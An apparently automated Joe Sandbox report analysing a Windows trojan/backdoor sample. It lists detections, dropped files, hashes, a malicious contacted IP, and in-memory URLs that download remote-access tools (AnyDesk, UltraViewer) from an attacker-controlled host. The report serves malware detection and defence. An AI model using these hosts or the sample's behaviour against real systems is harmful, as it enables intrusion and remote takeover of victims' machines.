Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	Indicator Removal on Host1	Keylogging	Remote System Discovery1	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	31%	Virustotal		Browse
#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	50%	ReversingLabs	Win32.Trojan.Antavmu
#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Windows\Vwxyab.exe	100%	Joe Sandbox ML
C:\Windows\Vwxyab.exe	31%	Virustotal		Browse
C:\Windows\Vwxyab.exe	50%	ReversingLabs	Win32.Trojan.Antavmu

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.3.#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe.10000000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.2.Vwxyab.exe.10000000.2.unpack	100%	Avira	BDS/Backdoor.Gen	Download File
1.2.Vwxyab.exe.10000000.2.unpack	100%	Avira	BDS/Backdoor.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://SVP7.NET:9874/AnyDesk.exe	0%	Virustotal		Browse
http://SVP7.NET:9874/AnyDesk.exe	0%	Avira URL Cloud	safe
http://svp7.net:9874/UltraViewer.exe	0%	Avira URL Cloud	safe
https://%s.xboxlive.com	0%	URL Reputation	safe
https://%s.xboxlive.com	0%	URL Reputation	safe
https://%s.xboxlive.com	0%	URL Reputation	safe
https://%s.xboxlive.com	0%	URL Reputation	safe
https://dynamic.t	0%	URL Reputation	safe
https://dynamic.t	0%	URL Reputation	safe
https://dynamic.t	0%	URL Reputation	safe
https://dynamic.t	0%	URL Reputation	safe
https://%s.dnet.xboxlive.com	0%	URL Reputation	safe
https://%s.dnet.xboxlive.com	0%	URL Reputation	safe
https://%s.dnet.xboxlive.com	0%	URL Reputation	safe
https://%s.dnet.xboxlive.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx	svchost.exe, 0000000D.00000003.308666742.0000022B47460000.00000004.00000001.sdmp	false		high
http://www.taobao.com/help/getip.php	Vwxyab.exe	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=	svchost.exe, 0000000D.00000003.308723240.0000022B47445000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Routes/	svchost.exe, 0000000D.00000002.309081651.0000022B4743E000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/Driving	svchost.exe, 0000000D.00000003.308666742.0000022B47460000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx	svchost.exe, 0000000D.00000002.309081651.0000022B4743E000.00000004.00000001.sdmp	false		high
https://t0.tiles.ditu.live.com/tiles/gen	svchost.exe, 0000000D.00000003.308679730.0000022B4744E000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/	svchost.exe, 0000000D.00000002.309081651.0000022B4743E000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=	svchost.exe, 0000000D.00000003.308723240.0000022B47445000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/Walking	svchost.exe, 0000000D.00000003.308666742.0000022B47460000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?	svchost.exe, 0000000D.00000002.309090689.0000022B47447000.00000004.00000001.sdmp	false		high
http://SVP7.NET:9874/AnyDesk.exe	Vwxyab.exe, 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp, Vwxyab.exe, 00000003.00000003.199399316.00000000022B0000.00000004.00000001.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://svp7.net:9874/UltraViewer.exe	Vwxyab.exe, 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp, Vwxyab.exe, 00000003.00000003.199399316.00000000022B0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=	svchost.exe, 0000000D.00000002.309041175.0000022B47413000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000002.309081651.0000022B4743E000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=	svchost.exe, 0000000D.00000002.309086770.0000022B47442000.00000004.00000001.sdmp	false		high
https://%s.xboxlive.com	svchost.exe, 0000000A.00000002.463955404.00000208FA83E000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 0000000D.00000003.308679730.0000022B4744E000.00000004.00000001.sdmp	false		high
https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 0000000D.00000003.287002628.0000022B47432000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/mapcontrol/logging.ashx	svchost.exe, 0000000D.00000003.308666742.0000022B47460000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/mapcontrol/logging.ashx	svchost.exe, 0000000D.00000003.308666742.0000022B47460000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/	svchost.exe, 0000000D.00000003.308698441.0000022B4744B000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=	svchost.exe, 0000000D.00000003.287002628.0000022B47432000.00000004.00000001.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=	svchost.exe, 0000000D.00000002.309090689.0000022B47447000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	svchost.exe, 00000007.00000002.466794376.00000200B1210000.00000002.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Transit/Schedules/	svchost.exe, 0000000D.00000002.309086770.0000022B47442000.00000004.00000001.sdmp	false		high
https://dynamic.t	svchost.exe, 0000000D.00000003.308679730.0000022B4744E000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/Transit	svchost.exe, 0000000D.00000003.308666742.0000022B47460000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen	svchost.exe, 0000000D.00000002.309067392.0000022B4743B000.00000004.00000001.sdmp	false		high
https://appexmapsappupdate.blob.core.windows.net	svchost.exe, 0000000D.00000003.308666742.0000022B47460000.00000004.00000001.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=	svchost.exe, 0000000D.00000002.309090689.0000022B47447000.00000004.00000001.sdmp	false		high
https://activity.windows.com	svchost.exe, 0000000A.00000002.463955404.00000208FA83E000.00000004.00000001.sdmp	false		high
http://www.bingmapsportal.com	svchost.exe, 0000000D.00000002.309041175.0000022B47413000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Locations	svchost.exe, 0000000D.00000003.308666742.0000022B47460000.00000004.00000001.sdmp	false		high
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/	svchost.exe, 0000000D.00000002.309081651.0000022B4743E000.00000004.00000001.sdmp	false		high
https://%s.dnet.xboxlive.com	svchost.exe, 0000000A.00000002.463955404.00000208FA83E000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=	svchost.exe, 0000000D.00000003.308698441.0000022B4744B000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
103.119.44.216	unknown	China		24000	LIHGL-AS-AP24hkglobalBGPHK	true

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	430789
Start date:	08.06.2021
Start time:	00:08:17
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.com (renamed file extension from com to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.bank.troj.spyw.evad.winEXE@18/11@0/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 57% (good quality ratio 53%) Quality average: 76% Quality standard deviation: 30.5%
HCA Information:	Successful, ratio: 82% Number of executed functions: 51 Number of non-executed functions: 389
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, UsoClient.exe Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 104.43.139.144, 104.43.193.48, 13.64.90.137, 40.88.32.150, 20.50.102.62, 92.122.144.200, 13.88.21.125, 20.54.26.129, 2.20.142.210, 2.20.142.209, 20.82.210.154, 92.122.213.194, 92.122.213.247 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus15.cloudapp.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing disassembly code.

Simulations

Behavior and APIs

Time	Type	Description
00:09:31	API Interceptor	2x Sleep call for process: svchost.exe modified
00:10:47	API Interceptor	1x Sleep call for process: MpCmdRun.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
LIHGL-AS-AP24hkglobalBGPHK	1.exe	Get hash	malicious	Browse	203.189.237.101
	861i4W3tvo.exe	Get hash	malicious	Browse	103.119.44.100
	RUc9a5U24b.exe	Get hash	malicious	Browse	103.119.44.100
	aiANh2r2WO.exe	Get hash	malicious	Browse	103.119.44.93
	#U4e2d#U4e13#U5973#U751f#U5b9e#U4e60#U671f#U95f4#U88ab#U5f3a#U5978#U89c6#U9891.exe	Get hash	malicious	Browse	103.119.44.244
	ppc_unpacked	Get hash	malicious	Browse	45.117.42.178

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.597889115294713
Encrypted:	false
SSDEEP:	6:b/OMk1GaD0JOCEfMuaaD0JOCEfMKQmDC6Al/gz2cE0fMbhEZolrRSQ2hyYIIT:bgGaD0JcaaD0JwQQC6Ag/0bjSQJ
MD5:	1A9B1B74B94A8EE46F226EBA4539B5FA
SHA1:	C1CAAF93F10040D301DBE6C66DA87C0990D9D664
SHA-256:	25AA67E0D576BB7767B9A6879CBF939FA8FB0685B0CBAA665C1646BF217CF702
SHA-512:	4A2724F6BF59891401D85EFA9C1A6FAD5FF4E9344FC010E126AABA0EFDB582E0B1F173DDC34C993A34F08EE7FABE5F4E5EB2C4DB212017E565741042D3F693C6
Malicious:	false
Preview:	....E..h..(..........y;.............. ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@........................y;...........&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x5cab43e2, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.09636108144020473
Encrypted:	false
SSDEEP:	12:QLz0+lM1O4blEuUKKLz0+lM1O4blEuUK:QLIMuSLIMu
MD5:	F5D17BC7A27AC6281A6B2D685831C6D1
SHA1:	976B15265E598AB6EF9118B767A08ECFE66F3C02
SHA-256:	EA0B4AB648A6A4E4A1B37354FAF1F242509EA9FABA2DC207C3AAC053180CCC87
SHA-512:	EFB4C79C677B3DEBAF29C7CD14D724958B865CEA0BF6311299E262B3A5E0769A7A41D0E51305502C5763ED34B9A8CA9D2768F2E1825E7BB502BD27CC4712C475
Malicious:	false
Preview:	\.C.... ................e.f.3...w........................&..........w.......y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w........................................................................................................................................................................................................................................:H.....y.k.................U.......y..........................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.11086134938174995
Encrypted:	false
SSDEEP:	3:6W9Ev6rIxXl/bJdAtiU6G8HYll:VY6rst4L8HI
MD5:	88204DA736E89B39A2622A8ED6A059E1
SHA1:	81147C805315B764080061108A9AF45FBA40365B
SHA-256:	47A36B5E99669170A7F6AEB87C2BECECEA60DF18B96C72D46E46EFF947EAFC22
SHA-512:	73444B9F897BA31DC1FB4D3A540A8D467A88B860D4D34AF51029134EF0D2FA325EF39D432C9673DF11D6A16BFE38121AEAF0387341D7A8822C03AB9A51B34ED0
Malicious:	false
Preview:	.........................................3...w.......y.......w...............w.......w....:O.....w...................U.......y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\Public\Documents\SVP7.PNG Download File
Process:	C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe
File Type:	data
Category:	dropped
Size (bytes):	156648
Entropy (8bit):	6.742847868109562
Encrypted:	false
SSDEEP:	1536:bze+yvZstva3VlIDxHZZ03F4qPVvL+CgilpTnAoRJddroYA1DUiVk0CqqZO1ZaVB:/Z5valluxFq5bVL9igyaVHjkKGcgtXU
MD5:	2DA0D1842CCE00414AD22F38C85CB111
SHA1:	99853F6A8378220427B6A05BEDB34E8F4E45645F
SHA-256:	CD70BDE1D7EABBE12EFD0BB2ED414DC6FE6645F7DABB0F3A39D7B70C6259BACE
SHA-512:	5457D25270DFD0D2DF3B54743C0D5A43B0B17A318045F7AAA0058EC1D47D5E0E8E51A260A57408969E8080E92A475CADDBC77D617C35D02F5DC67623ED6E7888
Malicious:	false
Preview:	- n.............F.......>.........................................@..J..F.2...............................:/+...................K.% ..% ..% ......$ ......+ ...4..$ ...5.. ...5... ...5..) ..4... ......' ......' ..% ..' ..d%x.$ ..d%~.> ..% .. ..5.. ..5..* ..(...% ...........5..2.....^..................d..........r#.......N...............................^..........................................8....................................~.......................................................N.......................................e.......d..............................8....N.......`..............>..>.........4..........................>................~.......6..............>..8........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11003924427858144
Encrypted:	false
SSDEEP:	12:26kTXm/Ey6q9995DwB8nq3qQ10nMCldimE8eawHjcJqP:26kKl68RyLyMCldzE9BHjcgP
MD5:	058C8471AD10610D6235FE460EDBD841
SHA1:	7EE054404F195743EA32D8EDA69D658A86CDB484
SHA-256:	FD323F632157514DA503CA44B91747D883FB47315D1D9042DD04D0CAF1018A9F
SHA-512:	EAAF6D09219666A8E32C110132350C4508BC6B664C3E6625FF050FD20537174A8486E81F104ACCEF40DCC30AB7EC081984E93EC7AF4233DB14F87D79DAB4E00F
Malicious:	false
Preview:	................................................................................X........2.......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...............................................................+..... ........B5\..........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.X........:......................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11263272124018148
Encrypted:	false
SSDEEP:	12:iY/zXm/Ey6q9995Dw1Xx1miM3qQ10nMCldimE8eawHza1miIyf:iY/ql68Rih1tMLyMCldzE9BHza1tIQ
MD5:	5601C69A4390A0CEA2E1E0EA13807DE5
SHA1:	EE44B7C79D647BF4D3E3A5CD010794C7577A9C4A
SHA-256:	8EFF83FAE05E0654E0A2BEA076CCF84E875C77D95BF1E4A875D30754197C2727
SHA-512:	392D2E27DC80DE5DF7E63D4353FA5820EE18EDFC845A09827286BB656FF6831AC6F01DA9C9084EDD06A4A4EBF3C142F1E14B03BAABCE9CA7B2CDA34003A74244
Malicious:	false
Preview:	................................................................................X................................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...............................................................+..... ........B5\..........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.X...............................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11261292935436817
Encrypted:	false
SSDEEP:	12:EU/VXm/Ey6q9995DwAsx1mK2P3qQ10nMCldimE8eawHza1mKs:t4l68RS1iPLyMCldzE9BHza1Y
MD5:	08B96D710D3B78BF476ECFE2E8E0D3E1
SHA1:	AB9C799EB1CC0344D2550C499A2C6E3D298AC2F3
SHA-256:	58E5FE8832176700CF0CEC0401FB39A88F532EB6B85AA62E70B6CD579C271306
SHA-512:	FB8ED4E39D8D3AB86752C12AEA03179FB6D8770F30A095346FD2C6A891C0F23DF738C6589CFE57F84288256ACFDF9EE747AEFC4F034BF3EF9AEE4F772AB573B3
Malicious:	false
Preview:	................................................................................X.......T>.......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...............................................................+..... .....w..B5\..........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.X........E......................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log Download File
Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	data
Category:	modified
Size (bytes):	906
Entropy (8bit):	3.1353004740983264
Encrypted:	false
SSDEEP:	12:58KRBubdpkoF1AG3rGtZk9+MlWlLehB4yAq7ejCLNI:OaqdmuF3rV+kWReH4yJ7MH
MD5:	0F7E2111B70D4003FD9DA2EC6FBD8F05
SHA1:	B65A7F14F89C28C0C0340B97F0EFF4D5AD2CD980
SHA-256:	949EA1B4772DB3724B4420536382A603F248D9E29294F7E11BA1AE9059A08C15
SHA-512:	F894F7F1DFCBA7EC6D7CE253C905A39A8434801B9D291728B63F667D82367B7FB81DC18B54C40089D0FF44515B71646839E1463EEDCDF157D8EE33DF3EB194B9
Malicious:	false
Preview:	........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.u.e. .. J.u.n. .. 0.8. .. 2.0.2.1. .0.0.:.1.0.:.4.7.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.u.e. .. J.u.n. .. 0.8. .. 2.0.2.1. .0.0.:.1.0.:.4.7.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

C:\Windows\Vwxyab.exe Download File
Process:	C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	637064
Entropy (8bit):	7.237686689980312
Encrypted:	false
SSDEEP:	12288:PRLU5FKrCc75CDUTOpI6Vi2+D7W2hJntw6icIS7ZRiL9NhUbl+iT14RaWd0EyRoh:pLPX75CQTO+6H+D7h06ivQRiL9NhUbl6
MD5:	D96987F5E2F64B880CFB3A7DE05FF0EF
SHA1:	EDD15437BE63392C7CD332919C332029A2240DD0
SHA-256:	2D9002135A5B85B3F3962EAB45859F1E59D20DED771B94F0E1127C6C162CB0F4
SHA-512:	226329AD4D9684A0EF0CFDB80450F9006A9D0F88007B3F31D4BFA6F258C94FDC06262F560327511ACB49847729875EE9E80F327F32F9B23A75EC0EB1FFA6090B
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 31%, Browse Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?...Q...Q...Q.R.....Q.R.....Q...P...Q..-,...Q..-<...Q..-?.0.Q..-#...Q..--...Q..-)...Q.Rich..Q.........PE..L......`.............................n............@.................................3.......................................t........P...P..........................................................PL..@...............\......@....................text...$........................... ..`.rdata..............................@..@.data...8i.......0..................@....rsrc....P...P...`..................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Vwxyab.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.237686689980312
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe
File size:	637064
MD5:	d96987f5e2f64b880cfb3a7de05ff0ef
SHA1:	edd15437be63392c7cd332919c332029a2240dd0
SHA256:	2d9002135a5b85b3f3962eab45859f1e59d20ded771b94f0e1127c6c162cb0f4
SHA512:	226329ad4d9684a0ef0cfdb80450f9006a9d0f88007b3f31d4bfa6f258c94fdc06262f560327511acb49847729875ee9e80f327f32f9b23a75ec0eb1ffa6090b
SSDEEP:	12288:PRLU5FKrCc75CDUTOpI6Vi2+D7W2hJntw6icIS7ZRiL9NhUbl+iT14RaWd0EyRoh:pLPX75CQTO+6H+D7h06ivQRiL9NhUbl6
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........?...Q...Q...Q.R.....Q.R.....Q...P...Q..-,...Q..-<...Q..-?.0.Q..-#...Q..--...Q..-)...Q.Rich..Q.........PE..L......`...........

File Icon


Icon Hash:	474a1b16c6cfe3db

Static PE Info

General
Entrypoint:	0x426e09
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x60BDAEB5 [Mon Jun 7 05:29:25 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b1c0d1d42a0924ee4f46344440b6e9de

Entrypoint Preview

Instruction
call 00007FBA087B3412h
jmp 00007FBA087AA39Bh
push ebp
mov ebp, esp
push ecx
push ebx
mov eax, dword ptr [ebp+0Ch]
add eax, 0Ch
mov dword ptr [ebp-04h], eax
mov ebx, dword ptr fs:[00000000h]
mov eax, dword ptr [ebx]
